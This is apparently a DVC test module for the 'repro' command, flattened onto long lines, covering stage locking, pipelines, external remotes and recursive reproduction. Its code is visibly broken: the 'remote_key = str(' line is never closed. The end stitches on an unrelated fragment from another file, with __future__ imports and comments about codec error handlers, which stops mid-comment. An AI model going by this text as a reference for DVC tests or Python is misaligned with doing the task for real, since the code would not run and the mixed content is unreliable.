self.dvc.reproduce(self._get_stage_target(self.stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertTrue(filecmp.cmp(self.file2, self.BAR, shallow=False)) self.assertEqual(len(stages), 3) class TestReproForceDownstream(TestDvc): def test(self): stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) foo_stage = stages[0] self.assertTrue(foo_stage is not None) code1 = "code1.py" shutil.copyfile(self.CODE, code1) file1 = "file1" file1_stage = self.dvc.run( outs=[file1], deps=[self.FOO, code1], cmd=f"python {code1} {self.FOO} {file1}", single_stage=True, ) self.assertTrue(file1_stage is not None) code2 = "code2.py" shutil.copyfile(self.CODE, code2) file2 = "file2" file2_stage = self.dvc.run( outs=[file2], deps=[file1, code2], cmd=f"python {code2} {file1} {file2}", single_stage=True, ) self.assertTrue(file2_stage is not None) code3 = "code3.py" shutil.copyfile(self.CODE, code3) file3 = "file3" file3_stage = self.dvc.run( outs=[file3], deps=[file2, code3], cmd=f"python {code3} {file2} {file3}", single_stage=True, ) self.assertTrue(file3_stage is not None) with open(code2, "a") as fobj: fobj.write("\n\n") stages = self.dvc.reproduce(file3_stage.path, force_downstream=True) self.assertEqual(len(stages), 2) self.assertEqual(stages[0].path, file2_stage.path) self.assertEqual(stages[1].path, file3_stage.path) class TestReproPipeline(TestReproChangedDeepData): def test(self): stages = self.dvc.reproduce( self._get_stage_target(self.stage), force=True, pipeline=True ) self.assertEqual(len(stages), 3) def test_cli(self): ret = main( ["repro", "--pipeline", "-f", self._get_stage_target(self.stage)] ) self.assertEqual(ret, 0) class TestReproPipelines(SingleStageRun, TestDvc): def setUp(self): super().setUp() stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) self.foo_stage = stages[0] self.assertTrue(self.foo_stage is not None) stages = self.dvc.add(self.BAR) self.assertEqual(len(stages), 1) self.bar_stage = stages[0] self.assertTrue(self.bar_stage is not None) self.file1 = "file1" self.file1_stage = self.dvc.run( fname=self.file1 + ".dvc", outs=[self.file1], deps=[self.FOO, 
self.CODE], cmd=f"python {self.CODE} {self.FOO} {self.file1}", single_stage=True, ) self.file2 = "file2" self.file2_stage = self._run( fname=self.file2 + ".dvc", outs=[self.file2], deps=[self.BAR, self.CODE], cmd=f"python {self.CODE} {self.BAR} {self.file2}", name="copy-BAR-file2", ) def test(self): stages = self.dvc.reproduce(all_pipelines=True, force=True) self.assertEqual(len(stages), 4) self.assertTrue(self.file1_stage in stages) self.assertTrue(self.file2_stage in stages) def test_cli(self): ret = main(["repro", "-f", "-P"]) self.assertEqual(ret, 0) class TestReproLocked(TestReproChangedData): def test(self): file2 = "file2" file2_stage = self._run( fname=file2 + ".dvc", outs=[file2], deps=[self.file1, self.CODE], cmd=f"python {self.CODE} {self.file1} {file2}", name="copy-file1-file2", ) self.swap_foo_with_bar() ret = main(["lock", self._get_stage_target(file2_stage)]) self.assertEqual(ret, 0) stages = self.dvc.reproduce(self._get_stage_target(file2_stage)) self.assertEqual(len(stages), 0) ret = main(["unlock", self._get_stage_target(file2_stage)]) self.assertEqual(ret, 0) stages = self.dvc.reproduce(self._get_stage_target(file2_stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) self.assertTrue(filecmp.cmp(file2, self.BAR, shallow=False)) self.assertEqual(len(stages), 3) def test_non_existing(self): with self.assertRaises(StageFileDoesNotExistError): self.dvc.lock_stage("Dvcfile") self.dvc.lock_stage("pipelines.yaml") self.dvc.lock_stage("pipelines.yaml:name") self.dvc.lock_stage("Dvcfile:name") self.dvc.lock_stage("stage.dvc") self.dvc.lock_stage("stage.dvc:name") self.dvc.lock_stage("not-existing-stage.json") ret = main(["lock", "non-existing-stage"]) self.assertNotEqual(ret, 0) class TestReproLockedCallback(SingleStageRun, TestDvc): def test(self): file1 = "file1" file1_stage = file1 + ".dvc" # NOTE: purposefully not specifying dependencies # to create a callback stage. 
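# A stage without dependencies (a "callback stage") is treated as always changed, so reproduce() re-runs it on every call until it is locked; the lock/unlock calls below verify exactly that (1 stage reproduced, then 0 while locked, then 1 again).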
stage = self._run( fname=file1_stage, outs=[file1], cmd=f"python {self.CODE} {self.FOO} {file1}", name="copy-FOO-file1", ) self.assertTrue(stage is not None) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 1) self.dvc.lock_stage(self._get_stage_target(stage)) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 0) self.dvc.lock_stage(self._get_stage_target(stage), unlock=True) stages = self.dvc.reproduce(self._get_stage_target(stage)) self.assertEqual(len(stages), 1) class TestReproLockedUnchanged(TestRepro): def test(self): """ Check that locking/unlocking doesn't affect stage state """ target = self._get_stage_target(self.stage) self.dvc.lock_stage(target) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 0) self.dvc.lock_stage(target, unlock=True) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 0) class TestReproMetricsAddUnchanged(TestDvc): def test(self): """ Check that adding/removing metrics doesn't affect stage state """ stages = self.dvc.add(self.FOO) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) file1 = "file1" file1_stage = file1 + ".dvc" self.dvc.run( fname=file1_stage, outs_no_cache=[file1], deps=[self.FOO, self.CODE], cmd=f"python {self.CODE} {self.FOO} {file1}", single_stage=True, ) stages = self.dvc.reproduce(file1_stage) self.assertEqual(len(stages), 0) self.dvc.metrics.add(file1) stages = self.dvc.reproduce(file1_stage) self.assertEqual(len(stages), 0) self.dvc.metrics.remove(file1) stages = self.dvc.reproduce(file1_stage) self.assertEqual(len(stages), 0) class TestReproPhony(TestReproChangedData): def test(self): stage = self._run( cmd="cat " + self.file1, deps=[self.file1], name="no_cmd" ) self.swap_foo_with_bar() self.dvc.reproduce(self._get_stage_target(stage)) self.assertTrue(filecmp.cmp(self.file1, self.BAR, shallow=False)) class TestNonExistingOutput(TestRepro): def test(self): os.unlink(self.FOO) with self.assertRaises(ReproductionError): self.dvc.reproduce(self._get_stage_target(self.stage)) class TestReproDataSource(TestReproChangedData): def test(self): self.swap_foo_with_bar() stages = self.dvc.reproduce(self.foo_stage.path) self.assertTrue(filecmp.cmp(self.FOO, self.BAR, shallow=False)) self.assertEqual(stages[0].outs[0].checksum, file_md5(self.BAR)[0]) class TestReproChangedDir(SingleStageRun, TestDvc): def test(self): file_name = "file" shutil.copyfile(self.FOO, file_name) dir_name = "dir" dir_code = "dir.py" code = ( 'import os; import shutil; os.mkdir("{}"); ' 'shutil.copyfile("{}", os.path.join("{}", "{}"))' ) with open(dir_code, "w+") as fd: fd.write(code.format(dir_name, file_name, dir_name, file_name)) stage = self._run( outs=[dir_name], deps=[file_name, dir_code], cmd=f"python {dir_code}", name="copy-in-dir", ) target = self._get_stage_target(stage) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 0) os.unlink(file_name) shutil.copyfile(self.BAR, file_name) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) class TestReproChangedDirData(SingleStageRun, TestDvc): def test(self): dir_name = "dir" dir_code = "dir_code.py" with open(dir_code, "w+") as fd: fd.write( "import os; import sys; import shutil; " "shutil.copytree(sys.argv[1], sys.argv[2])" ) stage = self._run( outs=[dir_name], deps=[self.DATA_DIR, dir_code], cmd=f"python {dir_code} {self.DATA_DIR} {dir_name}", name="copy-dir", ) target = self._get_stage_target(stage) self.assertTrue(stage is not None) stages = 
self.dvc.reproduce(target) self.assertEqual(len(stages), 0) with open(self.DATA_SUB, "a") as fd: fd.write("add") stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) # Check that dvc indeed registers changed output dir shutil.move(self.BAR, dir_name) stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) # Check that dvc registers mtime change for the directory. System.hardlink(self.DATA_SUB, self.DATA_SUB + ".lnk") stages = self.dvc.reproduce(target) self.assertEqual(len(stages), 1) self.assertTrue(stages[0] is not None) class TestReproMissingMd5InStageFile(TestRepro): def test(self): d = load_stage_file(self.file1_stage) del d[Stage.PARAM_OUTS][0][LocalRemote.PARAM_CHECKSUM] del d[Stage.PARAM_DEPS][0][LocalRemote.PARAM_CHECKSUM] dump_stage_file(self.file1_stage, d) stages = self.dvc.reproduce(self.file1_stage) self.assertEqual(len(stages), 1) class TestCmdRepro(TestReproChangedData): def test(self): self.swap_foo_with_bar() ret = main(["status"]) self.assertEqual(ret, 0) ret = main(["repro", self._get_stage_target(self.stage)]) self.assertEqual(ret, 0) ret = main(["repro", "non-existing-file"]) self.assertNotEqual(ret, 0) class TestCmdReproChdir(TestDvc): def test(self): dname = "dir" os.mkdir(dname) foo = os.path.join(dname, self.FOO) bar = os.path.join(dname, self.BAR) code = os.path.join(dname, self.CODE) shutil.copyfile(self.FOO, foo) shutil.copyfile(self.CODE, code) ret = main( [ "run", "--single-stage", "-f", f"{dname}/Dvcfile", "-w", f"{dname}", "-d", self.FOO, "-o", self.BAR, f"python {self.CODE} {self.FOO} {self.BAR}", ] ) self.assertEqual(ret, 0) self.assertTrue(os.path.isfile(foo)) self.assertTrue(os.path.isfile(bar)) self.assertTrue(filecmp.cmp(foo, bar, shallow=False)) os.unlink(bar) ret = main(["repro", "-c", dname, DVC_FILE]) self.assertEqual(ret, 0) self.assertTrue(os.path.isfile(foo)) self.assertTrue(os.path.isfile(bar)) self.assertTrue(filecmp.cmp(foo, bar, shallow=False)) class TestReproExternalBase(SingleStageRun, TestDvc): cache_type = None @staticmethod def should_test(): return False @property def cache_scheme(self): return self.scheme @property def scheme(self): return None @property def scheme_sep(self): return "://" @property def sep(self): return "/" def check_already_cached(self, stage): stage.outs[0].remove() patch_download = patch.object( stage.deps[0], "download", wraps=stage.deps[0].download ) patch_checkout = patch.object( stage.outs[0], "checkout", wraps=stage.outs[0].checkout ) from dvc.stage.run import cmd_run patch_run = patch("dvc.stage.run.cmd_run", wraps=cmd_run) with self.dvc.lock, self.dvc.state: with patch_download as mock_download: with patch_checkout as mock_checkout: with patch_run as mock_run: stage.locked = False stage.run() stage.locked = True mock_run.assert_not_called() mock_download.assert_not_called() mock_checkout.assert_called_once() @patch("dvc.prompt.confirm", return_value=True) def test(self, mock_prompt): if not self.should_test(): raise SkipTest(f"Test {self.__class__.__name__} is disabled") cache = ( self.scheme + self.scheme_sep + self.bucket + self.sep + str(uuid.uuid4()) ) ret = main(["config", "cache." 
+ self.cache_scheme, "myrepo"]) self.assertEqual(ret, 0) ret = main(["remote", "add", "myrepo", cache]) self.assertEqual(ret, 0) if self.cache_type: ret = main(["remote", "modify", "myrepo", "type", self.cache_type]) self.assertEqual(ret, 0) remote_name = "myremote" remote_key = str( remote = ( self.scheme + self.scheme_sep + self.bucket + self.sep + remote_key ) ret = main(["remote", "add", remote_name, remote]) self.assertEqual(ret, 0) if self.cache_type: ret = main( ["remote", "modify", remote_name, "type", self.cache_type] ) self.assertEqual(ret, 0) self.dvc = DvcRepo(".") foo_key = remote_key + self.sep + self.FOO bar_key = remote_key + self.sep + self.BAR foo_path = ( self.scheme + self.scheme_sep + self.bucket + self.sep + foo_key ) bar_path = ( self.scheme + self.scheme_sep + self.bucket + self.sep + bar_key ) # Using both plain and remote notation out_foo_path = "remote://" + remote_name + "/" + self.FOO out_bar_path = bar_path self.write(self.bucket, foo_key, self.FOO_CONTENTS) import_stage = self.dvc.imp_url(out_foo_path, "import") self.assertTrue(os.path.exists("import")) self.assertTrue(filecmp.cmp("import", self.FOO, shallow=False)) self.assertEqual(self.dvc.status([import_stage.path]), {}) self.check_already_cached(import_stage) import_remote_stage = self.dvc.imp_url( out_foo_path, out_foo_path + "_imported" ) self.assertEqual(self.dvc.status([import_remote_stage.path]), {}) cmd_stage = self._run( outs=[out_bar_path], deps=[out_foo_path], cmd=self.cmd(foo_path, bar_path), name="external-base", ) self.assertEqual(self.dvc.status([cmd_stage.addressing]), {}) self.assertEqual(self.dvc.status(), {}) self.check_already_cached(cmd_stage) self.write(self.bucket, foo_key, self.BAR_CONTENTS) self.assertNotEqual(self.dvc.status(), {}) self.dvc.update([import_stage.path]) self.assertTrue(os.path.exists("import")) self.assertTrue(filecmp.cmp("import", self.BAR, shallow=False)) self.assertEqual(self.dvc.status([import_stage.path]), {}) self.dvc.update([import_remote_stage.path]) self.assertEqual(self.dvc.status([import_remote_stage.path]), {}) stages = self.dvc.reproduce(cmd_stage.addressing) self.assertEqual(len(stages), 1) self.assertEqual(self.dvc.status([cmd_stage.addressing]), {}) self.assertEqual(self.dvc.status(), {}) self.dvc.gc(workspace=True) self.assertEqual(self.dvc.status(), {}) self.dvc.remove(cmd_stage.path, dvc_only=True) self.assertNotEqual(self.dvc.status([cmd_stage.addressing]), {}) self.dvc.checkout([cmd_stage.path], force=True) self.assertEqual(self.dvc.status([cmd_stage.addressing]), {}) @pytest.mark.skipif(os.name == "nt", reason="temporarily disabled on windows") class TestReproExternalS3(S3, TestReproExternalBase): @property def scheme(self): return "s3" @property def bucket(self): return TEST_AWS_REPO_BUCKET def cmd(self, i, o): return f"aws s3 cp {i} {o}" def write(self, bucket, key, body): s3 = boto3.client("s3") s3.put_object(Bucket=bucket, Key=key, Body=body) class TestReproExternalGS(GCP, TestReproExternalBase): @property def scheme(self): return "gs" @property def bucket(self): return TEST_GCP_REPO_BUCKET def cmd(self, i, o): return f"gsutil cp {i} {o}" def write(self, bucket, key, body): client = gc.Client() bucket = client.bucket(bucket) bucket.blob(key).upload_from_string(body) class TestReproExternalHDFS(HDFS, TestReproExternalBase): @property def scheme(self): return "hdfs" @property def bucket(self): return f"{getpass.getuser()}@127.0.0.1" def cmd(self, i, o): return f"hadoop fs -cp {i} {o}" def write(self, bucket, key, body): url = self.scheme + 
"://" + bucket + "/" + key p = Popen( f"hadoop fs -rm -f {url}", shell=True, executable=os.getenv("SHELL"), stdin=PIPE, stdout=PIPE, stderr=PIPE, ) p.communicate() p = Popen( "hadoop fs -mkdir -p {}".format(posixpath.dirname(url)), shell=True, executable=os.getenv("SHELL"), stdin=PIPE, stdout=PIPE, stderr=PIPE, ) out, err = p.communicate() if p.returncode != 0: print(out) print(err) self.assertEqual(p.returncode, 0) with open("tmp", "w+") as fd: fd.write(body) p = Popen( "hadoop fs -copyFromLocal {} {}".format("tmp", url), shell=True, executable=os.getenv("SHELL"), stdin=PIPE, stdout=PIPE, stderr=PIPE, ) out, err = p.communicate() if p.returncode != 0: print(out) print(err) self.assertEqual(p.returncode, 0) @flaky(max_runs=5, min_passes=1) class TestReproExternalSSH(SSH, TestReproExternalBase): _dir = None cache_type = "copy" @property def scheme(self): return "ssh" @property def bucket(self): if not self._dir: self._dir = self.mkdtemp() return f"{getpass.getuser()}@127.0.0.1:{self._dir}" def cmd(self, i, o): prefix = "ssh://" assert i.startswith(prefix) and o.startswith(prefix) i = i[len(prefix) :] o = o[len(prefix) :] return f"scp {i} {o}" def write(self, bucket, key, body): path = posixpath.join(self._dir, key) ssh = None sftp = None try: ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect("127.0.0.1") sftp = ssh.open_sftp() try: sftp.stat(path) sftp.remove(path) except OSError: pass stdin, stdout, stderr = ssh.exec_command( f"mkdir -p $(dirname {path})" ) self.assertEqual(stdout.channel.recv_exit_status(), 0) with sftp.open(path, "w+") as fobj: fobj.write(body) finally: if sftp: sftp.close() if ssh: ssh.close() class TestReproExternalLOCAL(Local, TestReproExternalBase): cache_type = "hardlink" def setUp(self): super().setUp() self.tmpdir = self.mkdtemp() ret = main(["config", "cache.type", "hardlink"]) self.assertEqual(ret, 0) self.dvc = DvcRepo(".") @property def cache_scheme(self): return "local" @property def scheme(self): return "" @property def scheme_sep(self): return "" @property def sep(self): return os.sep @property def bucket(self): return self.tmpdir def cmd(self, i, o): if os.name == "nt": return f"copy {i} {o}" return f"cp {i} {o}" def write(self, bucket, key, body): path = os.path.join(bucket, key) dname = os.path.dirname(path) if not os.path.exists(dname): os.makedirs(dname) with open(path, "w+") as fd: fd.write(body) class TestReproExternalHTTP(TestReproExternalBase): _external_cache_id = None @staticmethod def get_remote(port): return f"http://localhost:{port}/" @property def local_cache(self): return os.path.join(self.dvc.dvc_dir, "cache") def test(self): # Import with StaticFileServer() as httpd: import_url = urljoin(self.get_remote(httpd.server_port), self.FOO) import_output = "imported_file" import_stage = self.dvc.imp_url(import_url, import_output) self.assertTrue(os.path.exists(import_output)) self.assertTrue(filecmp.cmp(import_output, self.FOO, shallow=False)) self.dvc.remove("imported_file.dvc") with StaticFileServer(handler_class=ContentMD5Handler) as httpd: import_url = urljoin(self.get_remote(httpd.server_port), self.FOO) import_output = "imported_file" import_stage = self.dvc.imp_url(import_url, import_output) self.assertTrue(os.path.exists(import_output)) self.assertTrue(filecmp.cmp(import_output, self.FOO, shallow=False)) # Run --deps with StaticFileServer() as httpd: remote = self.get_remote(httpd.server_port) cache_id = str(uuid.uuid4()) cache = urljoin(remote, cache_id) ret1 = 
main(["remote", "add", "mycache", cache]) ret2 = main(["remote", "add", "myremote", remote]) self.assertEqual(ret1, 0) self.assertEqual(ret2, 0) self.dvc = DvcRepo(".") run_dependency = urljoin(remote, self.BAR) run_output = "remote_file" cmd = f'open("{run_output}", "w+")' with open("create-output.py", "w") as fd: fd.write(cmd) run_stage = self._run( deps=[run_dependency], outs=[run_output], cmd="python create-output.py", name="http_run", ) self.assertTrue(run_stage is not None) self.assertTrue(os.path.exists(run_output)) # Pull self.dvc.remove(import_stage.path, dvc_only=True) self.assertFalse(os.path.exists(import_output)) shutil.move(self.local_cache, cache_id) self.assertFalse(os.path.exists(self.local_cache)) self.dvc.pull([import_stage.path], remote="mycache") self.assertTrue(os.path.exists(import_output)) class TestReproShell(TestDvc): def test(self): if os.name == "nt": return fname = "shell.txt" stage = fname + ".dvc" self.dvc.run( fname=stage, outs=[fname], cmd=f"echo $SHELL > {fname}", single_stage=True, ) with open(fname) as fd: self.assertEqual(os.getenv("SHELL"), fd.read().strip()) os.unlink(fname) self.dvc.reproduce(stage) with open(fname) as fd: self.assertEqual(os.getenv("SHELL"), fd.read().strip()) class TestReproAllPipelines(SingleStageRun, TestDvc): def test(self): stages = [ self._run( fname="start.dvc", outs=["start.txt"], cmd="echo start > start.txt", name="start", ), self._run( fname="middle.dvc", deps=["start.txt"], outs=["middle.txt"], cmd="echo middle > middle.txt", name="middle", ), self._run( fname="final.dvc", deps=["middle.txt"], outs=["final.txt"], cmd="echo final > final.txt", name="final", ), self._run( fname="disconnected.dvc", outs=["disconnected.txt"], cmd="echo other > disconnected.txt", name="disconnected", ), ] from dvc.state import StateNoop self.dvc.state = StateNoop() with patch.object( Stage, "reproduce", side_effect=stages ) as mock_reproduce: ret = main(["repro", "--all-pipelines"]) self.assertEqual(ret, 0) self.assertEqual(mock_reproduce.call_count, 4) class TestReproNoCommit(TestRepro): def test(self): remove(self.dvc.cache.local.cache_dir) ret = main( ["repro", self._get_stage_target(self.stage), "--no-commit"] ) self.assertEqual(ret, 0) self.assertEqual(os.listdir(self.dvc.cache.local.cache_dir), ["runs"]) class TestReproAlreadyCached(TestRepro): def test(self): stage = self._run( fname="datetime.dvc", deps=[], outs=["datetime.txt"], cmd='python -c "import time; print(time.time())" > datetime.txt', name="datetime", ) run_out = stage.outs[0] repro_out = self.dvc.reproduce(self._get_stage_target(stage))[0].outs[ 0 ] self.assertNotEqual(run_out.checksum, repro_out.checksum) def test_force_with_dependencies(self): run_out = self.dvc.run( fname="datetime.dvc", deps=[self.FOO], outs=["datetime.txt"], cmd='python -c "import time; print(time.time())" > datetime.txt', single_stage=True, ).outs[0] ret = main(["repro", "--force", "datetime.dvc"]) self.assertEqual(ret, 0) repro_out = Dvcfile(self.dvc, "datetime.dvc").stage.outs[0] self.assertNotEqual(run_out.checksum, repro_out.checksum) def test_force_import(self): ret = main(["import-url", self.FOO, self.BAR]) self.assertEqual(ret, 0) patch_download = patch.object( LocalRemote, "download", side_effect=LocalRemote.download, autospec=True, ) patch_checkout = patch.object( BaseOutput, "checkout", side_effect=BaseOutput.checkout, autospec=True, ) with patch_download as mock_download: with patch_checkout as mock_checkout: assert main(["unlock", "bar.dvc"]) == 0 ret = main(["repro", "--force", "bar.dvc"]) 
self.assertEqual(ret, 0) self.assertEqual(mock_download.call_count, 1) self.assertEqual(mock_checkout.call_count, 0) class TestShouldDisplayMetricsOnReproWithMetricsOption(TestDvc): def test(self): metrics_file = "metrics_file" metrics_value = 0.123489015 ret = main( [ "run", "--single-stage", "-m", metrics_file, f"echo {metrics_value} >> {metrics_file}", ] ) self.assertEqual(0, ret) self._caplog.clear() from dvc.dvcfile import DVC_FILE_SUFFIX ret = main( ["repro", "--force", "--metrics", metrics_file + DVC_FILE_SUFFIX] ) self.assertEqual(0, ret) expected_metrics_display = f"{metrics_file}: {metrics_value}" self.assertIn(expected_metrics_display, self._caplog.text) @pytest.fixture def repro_dir(tmp_dir, dvc, run_copy): # Creates repo with following structure: # data_dir/dir_file origin_data # | | | # | | origin_copy.dvc # unrelated2.dvc | | | # | | unrelated1.dvc # dir/subdir/dir_file_copy.dvc | # | | # | dir/origin_copy_2.dvc # | | # \ / # \ / # dir/Dvcfile tmp_dir.gen( { "origin_data": "origin data content", "data_dir": {"dir_file": "dir file content"}, "dir": {"subdir": {}}, } ) stages = {} origin_copy = tmp_dir / "origin_copy" stage = run_copy("origin_data", os.fspath(origin_copy), single_stage=True) assert stage is not None assert origin_copy.read_text() == "origin data content" stages["origin_copy"] = stage origin_copy_2 = tmp_dir / "dir" / "origin_copy_2" stage = run_copy( os.fspath(origin_copy), os.fspath(origin_copy_2), fname=os.fspath(origin_copy_2) + ".dvc", single_stage=True, ) assert stage is not None assert origin_copy_2.read_text() == "origin data content" stages["origin_copy_2"] = stage dir_file_path = tmp_dir / "data_dir" / "dir_file" dir_file_copy = tmp_dir / "dir" / "subdir" / "dir_file_copy" stage = run_copy( os.fspath(dir_file_path), os.fspath(dir_file_copy), fname=os.fspath(dir_file_copy) + ".dvc", single_stage=True, ) assert stage is not None assert dir_file_copy.read_text() == "dir file content" stages["dir_file_copy"] = stage last_stage = tmp_dir / "dir" / DVC_FILE deps = [os.fspath(origin_copy_2), os.fspath(dir_file_copy)] stage = dvc.run( cmd="echo {}".format(" ".join(deps)), fname=os.fspath(last_stage), deps=deps, single_stage=True, ) assert stage is not None stages["last_stage"] = stage # Unrelated are to verify that reproducing `dir` will not trigger them too assert ( run_copy(os.fspath(origin_copy), "unrelated1", single_stage=True) is not None ) assert ( run_copy(os.fspath(dir_file_path), "unrelated2", single_stage=True) is not None ) yield stages def _rewrite_file(path_elements, new_content): if isinstance(path_elements, str): path_elements = [path_elements] file = Path(os.sep.join(path_elements)) file.unlink() file.write_text(new_content) def _read_out(stage): return Path(stage.outs[0].fspath).read_text() def test_recursive_repro_default(dvc, repro_dir): """ Test recursive repro on dir after a dep outside this dir has changed. """ _rewrite_file("origin_data", "new origin data content") stages = dvc.reproduce("dir", recursive=True) # Check that the dependency ("origin_copy") and the dependent stages # inside the folder have been reproduced ("origin_copy_2", "last_stage") assert stages == [ repro_dir["origin_copy"], repro_dir["origin_copy_2"], repro_dir["last_stage"], ] assert _read_out(repro_dir["origin_copy"]) == "new origin data content" assert _read_out(repro_dir["origin_copy_2"]) == "new origin data content" def test_recursive_repro_single(dvc, repro_dir): """ Test recursive single-item repro on dir after a dep outside this dir has changed. 
""" _rewrite_file("origin_data", "new origin content") _rewrite_file(["data_dir", "dir_file"], "new dir file content") stages = dvc.reproduce("dir", recursive=True, single_item=True) # Check that just stages inside given dir # with changed direct deps have been reproduced. # This means that "origin_copy_2" stage should not be reproduced # since it depends on "origin_copy". # Also check that "dir_file_copy" stage was reproduced before "last_stage" assert stages == [repro_dir["dir_file_copy"], repro_dir["last_stage"]] assert _read_out(repro_dir["dir_file_copy"]) == "new dir file content" def test_recursive_repro_single_force(dvc, repro_dir): """ Test recursive single-item force repro on dir without any dependencies changing. """ stages = dvc.reproduce("dir", recursive=True, single_item=True, force=True) # Check that all stages inside given dir have been reproduced # Also check that "dir_file_copy" stage was reproduced before "last_stage" # and that "origin_copy" stage was reproduced before "last_stage" stage assert len(stages) == 3 assert set(stages) == { repro_dir["origin_copy_2"], repro_dir["dir_file_copy"], repro_dir["last_stage"], } assert stages.index(repro_dir["origin_copy_2"]) < stages.index( repro_dir["last_stage"] ) assert stages.index(repro_dir["dir_file_copy"]) < stages.index( repro_dir["last_stage"] ) def test_recursive_repro_empty_dir(tmp_dir, dvc): """ Test recursive repro on an empty directory """ (tmp_dir / "emptydir").mkdir() stages = dvc.reproduce("emptydir", recursive=True, force=True) assert stages == [] def test_recursive_repro_recursive_missing_file(dvc): """ Test recursive repro on a missing file """ with pytest.raises(StageFileDoesNotExistError): dvc.reproduce("notExistingStage.dvc", recursive=True) with pytest.raises(StageFileDoesNotExistError): dvc.reproduce("notExistingDir/", recursive=True) def test_recursive_repro_on_stage_file(dvc, repro_dir): """ Test recursive repro on a stage file instead of directory """ stages = dvc.reproduce( repro_dir["origin_copy_2"].relpath, recursive=True, force=True ) assert stages == [repro_dir["origin_copy"], repro_dir["origin_copy_2"]] def test_dvc_formatting_retained(tmp_dir, dvc, run_copy): tmp_dir.dvc_gen("foo", "foo content") stage = run_copy( "foo", "foo_copy", fname="foo_copy.dvc", single_stage=True ) stage_path = tmp_dir / stage.relpath # Add comments and custom formatting to DVC-file lines = list(map(_format_dvc_line, stage_path.read_text().splitlines())) lines.insert(0, "# Starting comment") stage_text = "".join(line + "\n" for line in lines) stage_path.write_text(stage_text) # Rewrite data source and repro (tmp_dir / "foo").write_text("new foo") dvc.reproduce("foo_copy.dvc", force=True) assert _hide_md5(stage_text) == _hide_md5(stage_path.read_text()) def _format_dvc_line(line): # Add line comment for all cache and md5 keys if "cache:" in line or "md5:" in line: return line + " # line comment" # Format command as one word per line elif line.startswith("cmd: "): pre, command = line.split(None, 1) return pre + " >\n" + "\n".join(" " + s for s in command.split()) else: return line def _hide_md5(text): return re.sub(r"\b[a-f0-9]{32}\b", "", text) def test_downstream(dvc): # The dependency graph should look like this: # # E # / \ # D F # / \ \ # B C G # \ / # A # assert main(["run", "--single-stage", "-o", "A", "echo A>A"]) == 0 assert ( main(["run", "--single-stage", "-d", "A", "-o", "B", "echo B>B"]) == 0 ) assert ( main(["run", "--single-stage", "-d", "A", "-o", "C", "echo C>C"]) == 0 ) assert ( main( [ "run", 
"--single-stage", "-d", "B", "-d", "C", "-o", "D", "echo D>D", ] ) == 0 ) assert main(["run", "--single-stage", "-o", "G", "echo G>G"]) == 0 assert ( main(["run", "--single-stage", "-d", "G", "-o", "F", "echo F>F"]) == 0 ) assert ( main( [ "run", "--single-stage", "-d", "D", "-d", "F", "-o", "E", "echo E>E", ] ) == 0 ) # We want the evaluation to move from B to E # # E # / # D # / # B # evaluation = dvc.reproduce("B.dvc", downstream=True, force=True) assert len(evaluation) == 3 assert evaluation[0].relpath == "B.dvc" assert evaluation[1].relpath == "D.dvc" assert evaluation[2].relpath == "E.dvc" # B, C should be run (in any order) before D # See https://github.com/iterative/dvc/issues/3602 evaluation = dvc.reproduce("A.dvc", downstream=True, force=True) assert len(evaluation) == 5 assert evaluation[0].relpath == "A.dvc" assert {evaluation[1].relpath, evaluation[2].relpath} == {"B.dvc", "C.dvc"} assert evaluation[3].relpath == "D.dvc" assert evaluation[4].relpath == "E.dvc" @pytest.mark.skipif( os.name == "nt", reason="external output scenario is not supported on Windows", ) def test_ssh_dir_out(tmp_dir, dvc, ssh_server): tmp_dir.gen({"foo": "foo content"}) # Set up remote and cache user = ssh_server.test_creds["username"] port = ssh_server.port keyfile = ssh_server.test_creds["key_filename"] remote_url = SSHMocked.get_url(user, port) assert main(["remote", "add", "upstream", remote_url]) == 0 assert main(["remote", "modify", "upstream", "keyfile", keyfile]) == 0 cache_url = SSHMocked.get_url(user, port) assert main(["remote", "add", "sshcache", cache_url]) == 0 assert main(["config", "cache.ssh", "sshcache"]) == 0 assert main(["remote", "modify", "sshcache", "keyfile", keyfile]) == 0 # Recreating to reread configs repo = DvcRepo(dvc.root_dir) # To avoid "WARNING: UNPROTECTED PRIVATE KEY FILE" from ssh os.chmod(keyfile, 0o600) (tmp_dir / "script.py").write_text( "import sys, pathlib\n" "path = pathlib.Path(sys.argv[1])\n" "dir_out = path / 'dir-out'\n" "dir_out.mkdir()\n" "(dir_out / '1.txt').write_text('1')\n" "(dir_out / '2.txt').write_text('2')\n" ) url_info = URLInfo(remote_url) repo.run( cmd="python {} {}".format(tmp_dir / "script.py", url_info.path), single_stage=True, outs=["remote://upstream/dir-out"], deps=["foo"], # add a fake dep to not consider this a callback ) repo.reproduce("dir-out.dvc") repo.reproduce("dir-out.dvc", force=True) from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from pytest import raises GARBAGE = b"a\xef\xf9" # I had thought to wrap codec error handler registration in a context manager # so we could clean up the global registry state post-test, but: # > There is no API to unregister a codec search function, since deregistration # > would break the codec cache used by the registry to speedup codec # > lookup. # # > Why would you want to unregister a codec search function ? 
